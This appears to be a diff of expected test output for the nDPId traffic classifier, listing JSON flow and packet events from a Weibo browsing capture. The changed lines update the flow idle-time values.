+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":305,"source":"weibo.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073424,"flow_last_seen":1463089073424,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073424,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35811,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"weibo.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1463089073424,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073424,"pkt":"kDVu60UQeJKcD6iOCABFAAA8dN1AAEAGHxvAqAFpXbyG9ovjAFD5+n7QAAAAAKACchAf3wAAAgQFtAQCCAoAQQoNAAAAAAEDAwc="} 00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":306,"source":"weibo.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1463089073478,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1463089073478,"pkt":"eJKcD6iOkDVu60UQCABFAACdAABAAEARtpXAqAEBwKgBaQA1yPAAiVtu8RCBgAABAAUAAAAAAWcGYWxpY2RuA2NvbQAAAQABwAwABQABAADy0wAXAWcGYWxpY2RuA2NvbQdkYW51b3lpwA7AKgABAAEAAAGzAAQvWUHlwCoAAQABAAABswAEL1lBx8AqAAEAAQAAAbMABC9ZQcbAKgABAAEAAAGzAAQvWUHk"} 
00782{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":306,"source":"weibo.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073478,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1463089073478,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":51440,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Alibaba","breed":"Acceptable","category":"Web"},"dns": {"query":"g.alicdn.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"47.89.65.229"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":307,"source":"weibo.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073479,"flow_last_seen":1463089073479,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1463089073479,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":50533,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":307,"source":"weibo.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1463089073479,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073479,"pkt":"kDVu60UQeJKcD6iOCABFAAA8KD5AAEARjrjAqAFpwKgBAcVlADUAKPnf1EwBAAABAAAAAAAABGRhdGEFd2VpYm8DY29tAAABAAE="} 
00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":307,"source":"weibo.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073479,"flow_last_seen":1463089073479,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1463089073479,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":50533,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"data.weibo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":308,"source":"weibo.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073479,"flow_last_seen":1463089073479,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073479,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"47.89.65.229","src_port":50827,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"weibo.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1463089073479,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073479,"pkt":"kDVu60UQeJKcD6iOCABFAAA8PQxAAEAGymDAqAFpL1lB5caLAbuG5TcXAAAAAKACchASAQAAAgQFtAQCCAoAQQobAAAAAAEDAwc="} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":308,"source":"weibo.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073479,"flow_last_seen":1463089073479,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073479,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"47.89.65.229","src_port":50827,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"weibo.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1463089073479,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073479,"pkt":"kDVu60UQeJKcD6iOCABFAAA8PQxAAEAGymDAqAFpL1lB5caLAbuG5TcXAAAAAKACchASAQAAAgQFtAQCCAoAQQobAAAAAAEDAwc="} 00530{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"weibo.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1463089073488,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":78,"thread_ts_msec":1463089073488,"pkt":"eJKcD6iOkDVu60UQCABFAABiAABAAEARttDAqAEBwKgBaQA10NoATp++kZuBgAABAAIAAAAAA2xvZwZtbXN0YXQDY29tAAABAAHADAAFAAEAAAIfAAoDbG9nA2dkc8AQwCwAAQABAAAAIwAEjM2uAQ=="} 
00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":309,"source":"weibo.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073488,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1463089073488,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53466,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Alibaba","breed":"Acceptable","category":"Web"},"dns": {"query":"log.mmstat.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"140.205.174.1"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":310,"source":"weibo.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073488,"flow_last_seen":1463089073488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073488,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48352,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"weibo.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1463089073488,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073488,"pkt":"kDVu60UQeJKcD6iOCABFAAA8K\/hAAEAGEeTAqAFpjM2uAbzgAbtP+SHlAAAAAKACchCeNwAAAgQFtAQCCAoAQQodAAAAAAEDAwc="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":311,"source":"weibo.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073488,"flow_last_seen":1463089073488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073488,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48353,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"weibo.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1463089073488,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073488,"pkt":"kDVu60UQeJKcD6iOCABFAAA8i2VAAEAGsnbAqAFpjM2uAbzhAbvMrYF4AAAAAKACchDB7gAAAgQFtAQCCAoAQQodAAAAAAEDAwc="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":329,"source":"weibo.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073537,"flow_last_seen":1463089073537,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073537,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"222.73.28.96","src_port":42280,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":329,"source":"weibo.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1463089073537,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073537,"pkt":"kDVu60UQeJKcD6iOCABFAAA8pN1AAEAG2SPAqAFp3kkcYKUoAFA4Ca70AAAAAKACchCCVAAAAgQFtAQCCAoAQQopAAAAAAEDAwc="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":330,"source":"weibo.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073537,"flow_last_seen":1463089073537,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073537,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"47.89.65.229","src_port":50831,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":330,"source":"weibo.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1463089073537,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073537,"pkt":"kDVu60UQeJKcD6iOCABFAAA8GyhAAEAG7ETAqAFpL1lB5caPAbufLBEBAAAAAKACchAfvgAAAgQFtAQCCAoAQQopAAAAAAEDAwc="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":331,"source":"weibo.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073537,"flow_last_seen":1463089073537,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073537,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48356,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":331,"source":"weibo.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1463089073537,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073537,"pkt":"kDVu60UQeJKcD6iOCABFAAA8abpAAEAG1CHAqAFpjM2uAbzkAbvb32OTAAAAAKACchDQkgAAAgQFtAQCCAoAQQopAAAAAAEDAwc="} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"weibo.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1463089073616,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073616,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi+OyanX1+fp+0aAS\/\/9YyQAAAgQFqAQCCAoDdg1LAEEKDQEDAwc="} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"weibo.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1463089073616,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073616,"pkt":"kDVu60UQeJKcD6iOCABFAAA0dN5AAEAGHyLAqAFpXbyG9ovjAFD5+n7Rsmp19oAQAOWGdAAAAQEICgBBCj0Ddg1L"} -00921{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"weibo.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073424,"flow_last_seen":1463089073616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":398,"flow_tot_l4_payload_len":398,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1463089073616,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35811,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"js.t.sinajs.cn","url":"js.t.sinajs.cn\/t5\/register\/js\/v6\/pl\/base.js?version=201605130537","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"weibo.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1463089073635,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073635,"pkt":"eJKcD6iOkDVu60UQCABFAAA0AABAADEGFnUvWUHlwKgBaQG7xos8arg3huU3GIASOQiHzQAAAgQFqAEBBAIBAwMJ"} 
-00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"weibo.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1463089073635,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1463089073635,"pkt":"kDVu60UQeJKcD6iOCABFAAAoPQ1AAEAGynPAqAFpL1lB5caLAbuG5TcYPGq4OFAQAOUAuQAA"} -00854{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"weibo.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073479,"flow_last_seen":1463089073635,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1463089073635,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"47.89.65.229","src_port":50827,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"g.alicdn.com","ja3":"58e7f64db6e4fe4941dd9691d421196c","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,spdy\/3.1,http\/1.1"}} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"weibo.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1463089073759,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073759,"pkt":"eJKcD6iOkDVu60UQCABFAAA0AABAADEGFnUvWUHlwKgBaQG7xo+u1rhnnywRAoASOQgi\/AAAAgQFqAEBBAIBAwMJ"} 
-00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"weibo.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1463089073759,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1463089073759,"pkt":"kDVu60UQeJKcD6iOCABFAAAoGylAAEAG7FfAqAFpL1lB5caPAbufLBECrta4aFAQAOWb5wAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":310,"source":"weibo.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073488,"flow_last_seen":1463089073488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073488,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48352,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"weibo.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1463089073488,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073488,"pkt":"kDVu60UQeJKcD6iOCABFAAA8K\/hAAEAGEeTAqAFpjM2uAbzgAbtP+SHlAAAAAKACchCeNwAAAgQFtAQCCAoAQQodAAAAAAEDAwc="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":311,"source":"weibo.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073488,"flow_last_seen":1463089073488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073488,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48353,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"weibo.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1463089073488,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073488,"pkt":"kDVu60UQeJKcD6iOCABFAAA8i2VAAEAGsnbAqAFpjM2uAbzhAbvMrYF4AAAAAKACchDB7gAAAgQFtAQCCAoAQQodAAAAAAEDAwc="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":329,"source":"weibo.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073537,"flow_last_seen":1463089073537,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073537,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"222.73.28.96","src_port":42280,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":329,"source":"weibo.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1463089073537,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073537,"pkt":"kDVu60UQeJKcD6iOCABFAAA8pN1AAEAG2SPAqAFp3kkcYKUoAFA4Ca70AAAAAKACchCCVAAAAgQFtAQCCAoAQQopAAAAAAEDAwc="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":330,"source":"weibo.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073537,"flow_last_seen":1463089073537,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073537,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"47.89.65.229","src_port":50831,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":330,"source":"weibo.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1463089073537,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073537,"pkt":"kDVu60UQeJKcD6iOCABFAAA8GyhAAEAG7ETAqAFpL1lB5caPAbufLBEBAAAAAKACchAfvgAAAgQFtAQCCAoAQQopAAAAAAEDAwc="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":331,"source":"weibo.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073537,"flow_last_seen":1463089073537,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073537,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48356,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":331,"source":"weibo.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1463089073537,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073537,"pkt":"kDVu60UQeJKcD6iOCABFAAA8abpAAEAG1CHAqAFpjM2uAbzkAbvb32OTAAAAAKACchDQkgAAAgQFtAQCCAoAQQopAAAAAAEDAwc="} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"weibo.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1463089073616,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073616,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi+OyanX1+fp+0aAS\/\/9YyQAAAgQFqAQCCAoDdg1LAEEKDQEDAwc="} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"weibo.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1463089073616,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073616,"pkt":"kDVu60UQeJKcD6iOCABFAAA0dN5AAEAGHyLAqAFpXbyG9ovjAFD5+n7Rsmp19oAQAOWGdAAAAQEICgBBCj0Ddg1L"} +00921{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"weibo.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073424,"flow_last_seen":1463089073616,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":398,"flow_tot_l4_payload_len":398,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1463089073616,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35811,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"js.t.sinajs.cn","url":"js.t.sinajs.cn\/t5\/register\/js\/v6\/pl\/base.js?version=201605130537","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"weibo.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1463089073635,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073635,"pkt":"eJKcD6iOkDVu60UQCABFAAA0AABAADEGFnUvWUHlwKgBaQG7xos8arg3huU3GIASOQiHzQAAAgQFqAEBBAIBAwMJ"} 
